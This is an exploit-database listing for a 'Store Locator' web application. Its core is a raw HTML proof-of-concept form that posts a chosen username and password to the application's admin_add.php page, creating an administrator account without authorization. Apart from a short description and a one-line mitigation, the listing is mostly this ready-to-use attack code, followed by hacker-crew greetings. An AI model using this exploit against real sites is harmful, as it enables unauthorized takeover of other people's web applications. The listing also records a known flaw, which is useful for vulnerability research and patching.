Store Locator Remote Add Admin Exploit

vendor:

Store Locator

by:

Alnjm33-virus-pal, Predator-bingo2, xXx-jago-dz, inejcteur-4PY-SaYrOs, XR57, Tr0y-x, Ahmadso, alsaek

8,8

CVSS

HIGH

Remote Add Admin Exploit

264

CWE

Product Name: Store Locator

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

Store Locator Remote Add Admin Exploit

This exploit allows an attacker to remotely add an admin user to the Store Locator application. The attacker can send a POST request to the admin_add.php page with the username and password of the new admin user. The page will then create the new admin user with the provided credentials.

Mitigation:

The application should validate user input and ensure that only authorized users can create new admin accounts.

Source

Exploit-DB raw data:

# vendor: www.ghostscripter.com
::::::::::::::[explo!t]:::::::
:::::::


<html>
<head>
<title> Store Locator Remote Add Admin Exploit  </title>
</head>
<body text="#00FF00" bgcolor="#000000">
<form action=http://server/StoreLocator/adm/admin_add.php method=post
style="text-align: center">
<br>
User: <input name="username" type="text" id="username" value="" />
<br>
Pass: <input name="password" type="password" id="password" value=""  />
<br>
<input type="submit" name="Submit" value="Create Admin" /><br>
&nbsp;<br>
</p>
</form>
</body>
<html>

::::::::::::::::::::::::::::::::::::::::::
Greetz to : Alnjm33-virus-pal - Predator-bingo2 - xXx-jago-dz
-inejcteur-4PY-SaYrOs- XR57 -Tr0y-x Ahmadso -alsaek
AnD all Tunisian hacker

:::::::::::::::::::S.W.T:::::::::::::::::::::